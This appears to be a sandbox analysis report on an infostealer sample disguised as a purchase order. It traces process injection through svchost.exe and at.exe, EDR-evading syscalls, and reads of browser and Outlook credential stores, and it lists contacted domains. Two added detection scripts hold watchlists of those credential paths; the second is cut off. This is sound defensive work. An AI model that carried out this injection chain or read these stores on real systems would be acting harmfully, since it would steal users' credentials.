            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeNtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\PO #86637.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\at.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\at.exeSection loaded: NULL target: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe protection: read write
            Source: C:\Windows\SysWOW64\at.exeSection loaded: NULL target: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\at.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\at.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\at.exeThread register set: target process: 7136
            Source: C:\Windows\SysWOW64\at.exeThread APC queued: target process: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
            Source: C:\Users\user\Desktop\PO #86637.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 834008
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
            Source: C:\Users\user\Desktop\PO #86637.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO #86637.exe"
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeProcess created: C:\Windows\SysWOW64\at.exe "C:\Windows\SysWOW64\at.exe"
            Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
            Source: PO #86637.exe, yRUFfzlnDkMN.exe, 00000002.00000000.1760073404.0000000001630000.00000002.00000001.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000002.00000002.3547561937.0000000001630000.00000002.00000001.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000000.1918724385.0000000001220000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: yRUFfzlnDkMN.exe, 00000002.00000000.1760073404.0000000001630000.00000002.00000001.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000002.00000002.3547561937.0000000001630000.00000002.00000001.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000000.1918724385.0000000001220000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: yRUFfzlnDkMN.exe, 00000002.00000000.1760073404.0000000001630000.00000002.00000001.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000002.00000002.3547561937.0000000001630000.00000002.00000001.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000000.1918724385.0000000001220000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: yRUFfzlnDkMN.exe, 00000002.00000000.1760073404.0000000001630000.00000002.00000001.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000002.00000002.3547561937.0000000001630000.00000002.00000001.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000000.1918724385.0000000001220000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: PO #86637.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

Stealing of Sensitive Information

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3547857189.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1849093126.0000000007010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3546549257.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3547928511.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1844812308.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3549663217.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1845706736.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.3547926363.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\at.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\at.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\at.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\at.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\at.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\at.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\at.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\at.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\at.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: PO #86637.exe | Binary or memory string: WIN_XP
Source: PO #86637.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
Source: PO #86637.exe | Binary or memory string: WIN_XPe
Source: PO #86637.exe | Binary or memory string: WIN_VISTA
Source: PO #86637.exe | Binary or memory string: WIN_7
Source: PO #86637.exe | Binary or memory string: WIN_8
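The rows above show at.exe, the Windows scheduled-task utility, opening the Chrome and Edge credential stores (Login Data, Cookies, Web Data, Local State) and the Outlook MAPI profile key. The useful detection is the mismatch between the process and the owner of the data: only the browser should read its own store, only Outlook its profile key. The script below is an added example and not part of the report; its events are constructed to mirror the rows above, and the owner allow-list and store labels are assumptions to tune against a real estate's baseline.

```python
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    """One file or registry open, as a sandbox or EDR would record it."""
    process: str   # image path of the process doing the open
    kind: str      # "file" or "registry"
    target: str    # file path or registry key that was opened


# Credential stores named in the report, with the image names that own them.
# Entry layout: (pattern on the target, label, legitimate owner image names).
# The owner sets are an assumption for this example.
WATCHLIST = [
    (re.compile(r"\\Google\\Chrome\\User Data\\(?:.*\\)?(Login Data|Cookies|Web Data|Local State)$", re.I),
     "chrome-credential-store", {"chrome.exe"}),
    (re.compile(r"\\Microsoft\\Edge\\User Data\\(?:.*\\)?(Login Data|Cookies|Web Data|Local State)$", re.I),
     "edge-credential-store", {"msedge.exe"}),
    (re.compile(r"^HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\"
                r"Windows Messaging Subsystem\\Profiles\\", re.I),
     "outlook-mapi-profile", {"outlook.exe"}),
]


def image_name(path):
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def scan(events):
    """Return one alert per credential-store access made by a non-owner process."""
    alerts = []
    for ev in events:
        for pattern, label, owners in WATCHLIST:
            if pattern.search(ev.target) and image_name(ev.process) not in owners:
                alerts.append({"process": ev.process, "store": label, "target": ev.target})
    return alerts


def summarize(alerts):
    """Collapse alerts to {image name: sorted distinct stores touched}.

    One process reaching into several different stores is the harvesting
    pattern the report's rows describe, and is a stronger signal than any
    single open."""
    touched = defaultdict(set)
    for alert in alerts:
        touched[image_name(alert["process"])].add(alert["store"])
    return {proc: sorted(stores) for proc, stores in touched.items()}


AT = r"C:\Windows\SysWOW64\at.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
PROFILE = r"C:\Users\user\AppData\Local"

# Constructed sample mirroring the report's rows; not sandbox output.
SAMPLE_EVENTS = [
    Event(AT, "file", PROFILE + r"\Google\Chrome\User Data\Default\Cookies"),
    Event(AT, "file", PROFILE + r"\Google\Chrome\User Data\Default\Network\Cookies"),
    Event(AT, "file", PROFILE + r"\Microsoft\Edge\User Data\Default\Network\Cookies"),
    Event(AT, "file", PROFILE + r"\Google\Chrome\User Data\Default\Login Data"),
    Event(AT, "file", PROFILE + r"\Microsoft\Edge\User Data\Default\Login Data"),
    Event(AT, "file", PROFILE + r"\Google\Chrome\User Data\Default\Network\Local State"),
    Event(AT, "file", PROFILE + r"\Google\Chrome\User Data\Default\Local State"),
    Event(AT, "file", PROFILE + r"\Google\Chrome\User Data\Default\Web Data"),
    Event(AT, "registry", "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\"
                          "Windows Messaging Subsystem\\Profiles\\Outlook\\"),
    # Benign controls: the browser reading its own store, and an unrelated open.
    Event(CHROME, "file", PROFILE + r"\Google\Chrome\User Data\Default\Login Data"),
    Event(r"C:\Windows\explorer.exe", "file", PROFILE + r"\Temp\report.txt"),
]

if __name__ == "__main__":
    for proc, stores in summarize(scan(SAMPLE_EVENTS)).items():
        print(f"{proc}: {', '.join(stores)}")
```

On the constructed input every alert belongs to at.exe and the summary shows it touching all three store families; chrome.exe reading Login Data produces nothing. The same logic applies to Sysmon event ID 11/12/13 or EDR file-open telemetry once the fields are mapped onto Event.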

Remote Access Functionality

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3547857189.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1849093126.0000000007010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3546549257.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3547928511.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1844812308.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3549663217.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1845706736.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.3547926363.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject
MITRE ATT&CK matrix (techniques with matched signatures; the bracketed figure is the signature badge the report renders in that cell, reproduced as shown)

Reconnaissance: no matched techniques
Resource Development: no matched techniques
Initial Access: Valid Accounts [2]
Execution: Native API [2]; Scheduled Task/Job [1]
Persistence: DLL Side-Loading [1]; Valid Accounts [2]; Scheduled Task/Job [1]
Privilege Escalation: Exploitation for Privilege Escalation [1]; Abuse Elevation Control Mechanism [1]; DLL Side-Loading [1]; Valid Accounts [2]; Access Token Manipulation [21]; Process Injection [412]; Scheduled Task/Job [1]
Defense Evasion: Disable or Modify Tools [1]; Deobfuscate/Decode Files or Information [1]; Abuse Elevation Control Mechanism [1]; Obfuscated Files or Information [3]; DLL Side-Loading [1]; Valid Accounts [2]; Virtualization/Sandbox Evasion [2]; Access Token Manipulation [21]; Process Injection [412]
Credential Access: OS Credential Dumping [1]; Input Capture [21]
Discovery: System Time Discovery [2]; Account Discovery [1]; File and Directory Discovery [2]; System Information Discovery [16]; Security Software Discovery [141]; Virtualization/Sandbox Evasion [2]; Process Discovery [3]; Application Window Discovery [11]; System Owner/User Discovery [1]
Lateral Movement: no matched techniques
Collection: Archive Collected Data [1]; Data from Local System [1]; Email Collection [1]; Input Capture [21]; Clipboard Data [3]
Command and Control: Ingress Tool Transfer [4]; Encrypted Channel [1]; Non-Application Layer Protocol [4]; Application Layer Protocol [4]
Exfiltration: no matched techniques
Impact: System Shutdown/Reboot [1]

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph (ID 1515412; sample PO #86637.exe; start date 22/09/2024; architecture WINDOWS; score 100)

Sample level: contacts www.syvra.xyz, www.zhuoyueapp.top and 18 other IPs or domains. Signatures: Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); 8 other signatures. www.syvra.xyz: Performs DNS queries to domains with low reputation.

Process chain:
• PO #86637.exe (started): Writes to foreign memory regions; Maps a DLL or memory area into another process. Starts svchost.exe.
• svchost.exe: Maps a DLL or memory area into another process. Injects into yRUFfzlnDkMN.exe.
• yRUFfzlnDkMN.exe (injected): Found direct / indirect Syscall (likely to bypass EDR). Starts at.exe.
• at.exe: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures. Injects into yRUFfzlnDkMN.exe; starts firefox.exe.
• yRUFfzlnDkMN.exe (injected from at.exe): Found direct / indirect Syscall (likely to bypass EDR). Network: easyanalytics.site 162.241.226.190 (ports 49762, 49763, 49764; UNIFIEDLAYER-AS-1US, United States); www.subitoadomicilio.shop 195.24.68.25 (ports 49738, 49739, 49740; RU-CENTERRU, Russian Federation); 7 other IPs or domains.
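The chain in the behavior graph is the detection opportunity: a desktop executable starts svchost.exe, a service host that should only ever be a child of services.exe, and the scheduled-task utility at.exe ends up spawning firefox.exe. A process-lineage check that encodes those two expectations, added here as an example and not part of the report: the tree is constructed to mirror the graph (the injection hop through yRUFfzlnDkMN.exe is collapsed onto svchost.exe), and the expected-parent table is an assumption to adjust to the environment's baseline.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str  # full image path


# Where these Windows binaries are expected to be launched from.
# Assumed baseline for the example; real estates need their own.
EXPECTED_PARENT = {
    "svchost.exe": {"services.exe"},
    "at.exe": {"cmd.exe", "powershell.exe", "explorer.exe"},
}

# Console-only scheduling utilities have no reason to start a browser.
CONSOLE_UTILITIES = {"at.exe", "schtasks.exe"}
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}


def image_name(path):
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def build_index(procs):
    return {p.pid: p for p in procs}


def lineage(index, pid):
    """Image names from the root ancestor down to pid.

    The walk stops at a missing parent or a pid cycle, so a partial
    telemetry snapshot cannot send it into an infinite loop."""
    chain, seen = [], set()
    while pid in index and pid not in seen:
        seen.add(pid)
        chain.append(image_name(index[pid].image))
        pid = index[pid].ppid
    return list(reversed(chain))


def check_tree(procs):
    """Return findings for unexpected parents and console utilities spawning browsers."""
    index = build_index(procs)
    findings = []
    for p in procs:
        name = image_name(p.image)
        parent = index.get(p.ppid)
        parent_name = image_name(parent.image) if parent else None
        if name in EXPECTED_PARENT and parent_name not in EXPECTED_PARENT[name]:
            findings.append({"rule": "unexpected-parent", "pid": p.pid,
                             "detail": f"{name} started by {parent_name}",
                             "lineage": lineage(index, p.pid)})
        if parent_name in CONSOLE_UTILITIES and name in BROWSERS:
            findings.append({"rule": "console-utility-spawned-browser", "pid": p.pid,
                             "detail": f"{parent_name} started {name}",
                             "lineage": lineage(index, p.pid)})
    return findings


# Constructed tree mirroring the report's graph; pids are invented.
SAMPLE_TREE = [
    Proc(1000, 0, r"C:\Windows\explorer.exe"),
    Proc(1200, 1000, r"C:\Users\user\Desktop\PO #86637.exe"),
    Proc(1300, 1200, r"C:\Windows\SysWOW64\svchost.exe"),
    Proc(1400, 1300, r"C:\Windows\SysWOW64\at.exe"),
    Proc(1500, 1400, r"C:\Program Files\Mozilla Firefox\firefox.exe"),
    # Benign control: a genuine service host under services.exe.
    Proc(600, 500, r"C:\Windows\System32\services.exe"),
    Proc(700, 600, r"C:\Windows\System32\svchost.exe"),
]

if __name__ == "__main__":
    for finding in check_tree(SAMPLE_TREE):
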